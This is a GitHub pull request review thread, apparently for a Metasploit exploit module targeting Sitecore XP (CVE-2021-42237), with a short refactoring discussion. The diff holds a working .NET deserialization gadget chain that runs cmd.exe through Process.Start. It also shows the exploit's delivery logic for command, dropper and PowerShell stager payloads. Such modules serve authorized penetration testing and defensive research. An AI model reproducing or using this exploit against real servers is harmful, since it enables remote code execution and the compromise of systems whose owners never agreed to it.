modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb

```diff
@@ -0,0 +1,214 @@
+                            xmlns=""
+                            xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                            <Name z:Ref="11" i:nil="true"/>
+                            <AssemblyName z:Ref="12" i:nil="true"/>
+                            <ClassName z:Ref="13" i:nil="true"/>
+                            <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
+                            <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
+                            <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                            <GenericArguments i:nil="true"/>
+                        </method0>
+                        <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
+                            xmlns=""
+                            xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                            <Name z:Ref="8" i:nil="true"/>
+                            <AssemblyName z:Ref="6" i:nil="true"/>
+                            <ClassName z:Ref="9" i:nil="true"/>
+                            <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
+                            <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
+                            <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                            <GenericArguments i:nil="true"/>
+                        </method1>
+                    </_comparison>
+                </Comparer>
+                <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
+                    xmlns="">
+                    <string z:Id="25"
+                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c PAYLOAD</string>
+                    <string z:Id="26"
+                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string>
+                </Items>
+            </ArrayOfstring>
+        </parameter>
+    </parameters>|
+  end
+
+  def exploit
+    case target['Type']
+    when :win_cmd
+      print_status('Executing command payload')
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    tmp_xml_payload = xml_payload.gsub(/PAYLOAD/, cmd.encode(xml: :text))
```

Comment:
I don't want to nitpick this further, but `xml_payload` _could_ take an argument instead.

Reply:
`xml_payload(cmd)`, where `cmd` is encoded within the method.

Reply:
That would also obviate the need for `tmp_xml_payload`.

Reply:
We must program harder, better, faster, stronger 😄 Will fix this cause lets be honest my way of doing this wasn't really the right way.

Reply:
There are many ways. I'm striving for readability/maintainability. :)

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15858/commits/7e01e33e513921ca78ff326f2d8555a53d5be817, let me know if you find anything else similar.

Reply:
Nope, looks great!